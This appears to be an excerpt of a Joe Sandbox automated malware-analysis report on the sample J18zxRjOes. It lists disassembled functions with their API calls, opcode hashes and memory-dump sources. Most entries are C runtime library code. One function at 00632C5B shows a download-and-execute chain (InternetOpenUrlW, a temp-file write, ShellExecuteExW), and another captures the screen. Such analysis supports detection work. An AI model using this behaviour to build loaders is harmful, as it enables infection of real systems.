Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction Fuzzy Hash:

Function 0043BBC1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0043BBC1

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08

Function 004373D9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105

Function 004071AB Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96

Function 006576EB Relevance: .4, Instructions: 356COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
Instruction ID: f6f13ecd5a122ed95b9ce8729d5abae846d3c1f4bc577e04208fd539bb9e1578
Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
Instruction Fuzzy Hash: 61D1C67210C1A20ECB6D4A39947407ABFE36A42363B1D479DDCF7CB6C2ED20DA59D660

Function 00657FCE Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: a02c1208c4a38bba5147c3ee836b9255972859657d16e42a7439a1330a92d51f
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 569165722094E34EDB29463A847407EFEE25A513A3B1A079DDCF2DB6C1EE24865DD620

Function 00427D67 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624

Function 00658289 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 3b20804ebedb7227301e756395b3fcd500c7e0222e98d6a3dcc874f55229c23c
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: F89163721090E34EDB69467A853407EFFE25A523A3B1A079DDCF2DBAC1ED24C55CE620

Function 00428022 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628

Function 00657D07 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: aaa1250b6d1da8f50b266b3a5402e7110803be92ef877dab17b1c7b340cb595a
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: FF91747210D1E30EDB29863D953547DFEE39E513A3B1A079DDCF2CB2C1EE249958A620

Function 00427AA0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628

Function 0065D755 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction ID: 66bca83787d5f0d6f56f00603b0f970e84c1ad9bbd5730fdebe1b6fc03bad3e2
Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction Fuzzy Hash: 6D61667160070966EB386A6C8C92BFE6397AF55707F14091EEC82DF3C1E611DD8E8359

Function 0042D4EE Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E

Function 00657A5D Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: e276fd1597c7cd88b2e6880e2186cc52a2b7d8f298693678297175af5d13bd51
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 0281527220C0E34DDB69463EA47407EFFE35B513A3B1A079DDCF2CA2C1ED149A59A620

Function 004277F6 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624

Function 006587C7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 2af00ebd35def8c2d9f3a2b1cb7ddf77dde37d0566945f5d741f403bbf1b15f6
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: CB1108772011424F9614863ED8B41FAE387EAC5322FBC427AD8826BF58DB22D94D9600

Function 00428560 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C

Function 005F0083 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3948087329.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: aee63bfc0ebe0275777682fff527ab4a09e6e9e666620f5f6216fbf1e24b7687
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 4611A0723401049FD740DF55DCC5FA677EAFB88320B298065EE04CB356D679E801C760

Function 00630D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 4e22ff19d84ff57596d9aa5f73c4e7c363ef0844f3d0a7dee64623f48e534a4e
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 0201A276B006048FEF21CF64C814BEA33EAFF86316F4544E5D90A97381E774A9498BD0

Function 004020FA Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
GetClientRect.USER32(?,?), ref: 0040214A
GetDC.USER32(?), ref: 00402151
CreateSolidBrush.GDI32(00646464), ref: 00402164
SelectObject.GDI32(00000000,00000000), ref: 00402178
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
SelectObject.GDI32(00000000,00000000), ref: 00402191
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
SelectObject.GDI32(00000000,00000000), ref: 004021EA
SetBkMode.GDI32(?,00000001), ref: 00402267
SetTextColor.GDI32(?,00000000), ref: 00402276
_wcslen.LIBCMT ref: 0040227F

Strings

Tahoma, xrefs: 004021BE

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
String ID: Tahoma
API String ID: 3832963559-3580928618
Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14

Function 00402571 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 004025CD
DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
ReleaseCapture.USER32 ref: 004025F2
GetDC.USER32(00000000), ref: 00402619
CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
CreateCompatibleDC.GDI32(?), ref: 004026A9
SelectObject.GDI32(00000000,00000000), ref: 004026B3
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
ShowWindow.USER32(?,00000000), ref: 004026EA
GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
DeleteFileW.KERNEL32(?), ref: 00402731
DeleteDC.GDI32(00000000), ref: 00402738
DeleteObject.GDI32(00000000), ref: 0040273F
ReleaseDC.USER32(00000000,?), ref: 0040274D
DestroyWindow.USER32(?), ref: 00402754
SetCapture.USER32(?), ref: 004027A1
GetDC.USER32(00000000), ref: 004027D5
ReleaseDC.USER32(00000000,00000000), ref: 004027EB
GetKeyState.USER32(0000001B), ref: 004027F8
DestroyWindow.USER32(?), ref: 0040280D

Strings

gya, xrefs: 0040270B

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
String ID: gya
API String ID: 2545303185-1989253062
Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C

Function 0065E919 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0065E989
_free.LIBCMT ref: 0065E99F
_free.LIBCMT ref: 0065E9B0
_free.LIBCMT ref: 0065E9C1
_free.LIBCMT ref: 0065E9D8
GetCPInfo.KERNEL32(?,?), ref: 0065EA20

Part of subcall function 00666952: _free.LIBCMT ref: 006669BD

_free.LIBCMT ref: 0065EBCC
_free.LIBCMT ref: 0065EBDF
_free.LIBCMT ref: 0065EBED
_free.LIBCMT ref: 0065EBF8
_free.LIBCMT ref: 0065EC3A
_free.LIBCMT ref: 0065EC42
_free.LIBCMT ref: 0065EC4A
_free.LIBCMT ref: 0065EC52
_free.LIBCMT ref: 0065EC60

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction ID: af6ab92a5959ee12ac85fba7ffb81dc6f95b6cb7bce5ca8cc1a8f7379a3515ba
Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction Fuzzy Hash: F4B1AE71900209AFDF649F68C881BEEBBF6BF08301F14416DF899E7342DB7699458B64

Function 0042E6B2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0042E722
_free.LIBCMT ref: 0042E738
_free.LIBCMT ref: 0042E749
_free.LIBCMT ref: 0042E75A
_free.LIBCMT ref: 0042E771
GetCPInfo.KERNEL32(?,?), ref: 0042E7B9

Part of subcall function 004366EB: _free.LIBCMT ref: 00436756

_free.LIBCMT ref: 0042E965
_free.LIBCMT ref: 0042E978
_free.LIBCMT ref: 0042E986
_free.LIBCMT ref: 0042E991
_free.LIBCMT ref: 0042E9D3
_free.LIBCMT ref: 0042E9DB
_free.LIBCMT ref: 0042E9E3
_free.LIBCMT ref: 0042E9EB
_free.LIBCMT ref: 0042E9F9

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24

Function 0066A85F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0066A8A3

Part of subcall function 00669BF2: _free.LIBCMT ref: 00669C0F
Part of subcall function 00669BF2: _free.LIBCMT ref: 00669C21
Part of subcall function 00669BF2: _free.LIBCMT ref: 00669C33
Part of subcall function 00669BF2: _free.LIBCMT ref: 00669C45
Part of subcall function 00669BF2: _free.LIBCMT ref: 00669C57
Part of subcall function 00669BF2: _free.LIBCMT ref: 00669C69
Part of subcall function 00669BF2: _free.LIBCMT ref: 00669C7B
Part of subcall function 00669BF2: _free.LIBCMT ref: 00669C8D
Part of subcall function 00669BF2: _free.LIBCMT ref: 00669C9F
Part of subcall function 00669BF2: _free.LIBCMT ref: 00669CB1
Part of subcall function 00669BF2: _free.LIBCMT ref: 00669CC3
Part of subcall function 00669BF2: _free.LIBCMT ref: 00669CD5
Part of subcall function 00669BF2: _free.LIBCMT ref: 00669CE7

_free.LIBCMT ref: 0066A898

Part of subcall function 006636D1: HeapFree.KERNEL32(00000000,00000000,?,0066A35F,?,00000000,?,00000000,?,0066A603,?,00000007,?,?,0066A9F7,?), ref: 006636E7
Part of subcall function 006636D1: GetLastError.KERNEL32(?,?,0066A35F,?,00000000,?,00000000,?,0066A603,?,00000007,?,?,0066A9F7,?,?), ref: 006636F9

_free.LIBCMT ref: 0066A8BA
_free.LIBCMT ref: 0066A8CF
_free.LIBCMT ref: 0066A8DA
_free.LIBCMT ref: 0066A8FC
_free.LIBCMT ref: 0066A90F
_free.LIBCMT ref: 0066A91D
_free.LIBCMT ref: 0066A928
_free.LIBCMT ref: 0066A960
_free.LIBCMT ref: 0066A967
_free.LIBCMT ref: 0066A984
_free.LIBCMT ref: 0066A99C

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: 5e15c9ee0ddc4397b9785d68902a7929535acc1f3629274f782085b95316c412
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: 73317031600201AFEB60ABB9D845B9AB3EABF00350F21451EE449E7791DF71ED51CF29

Function 0043A5F8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0043A63C

Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80

_free.LIBCMT ref: 0043A631

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A653
_free.LIBCMT ref: 0043A668
_free.LIBCMT ref: 0043A673
_free.LIBCMT ref: 0043A695
_free.LIBCMT ref: 0043A6A8
_free.LIBCMT ref: 0043A6B6
_free.LIBCMT ref: 0043A6C1
_free.LIBCMT ref: 0043A6F9
_free.LIBCMT ref: 0043A700
_free.LIBCMT ref: 0043A71D
_free.LIBCMT ref: 0043A735

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A

Function 00439A89 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439AD1
_free.LIBCMT ref: 00439AF5
_free.LIBCMT ref: 00439B02
_free.LIBCMT ref: 00439B27
_free.LIBCMT ref: 00439B34
_free.LIBCMT ref: 00439B3D
_free.LIBCMT ref: 00439E1B
_free.LIBCMT ref: 00439E23

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54

Function 00632C5B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 134filenetworksynchronizationCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 00632C7E
InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00632C94
GetTempPathW.KERNEL32(00000105,?), ref: 00632CB0
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00632CC6
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00632CFF
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00632D3B
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00632D58
ShellExecuteExW.SHELL32(?), ref: 00632DCF
WaitForSingleObject.KERNEL32(?,00008000), ref: 00632DE4

Strings

<, xrefs: 00632DAC

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: <
API String ID: 838076374-4251816714
Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
Instruction ID: d426f95509ae7b8b0556dd6991dc5755c4c17bbe24c702ef185f1a6143b84722
Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
Instruction Fuzzy Hash: 14413DB190021DAFEB209F64DC85FEAB7FDFF05745F0081E9A549A2150DE709E858FA4

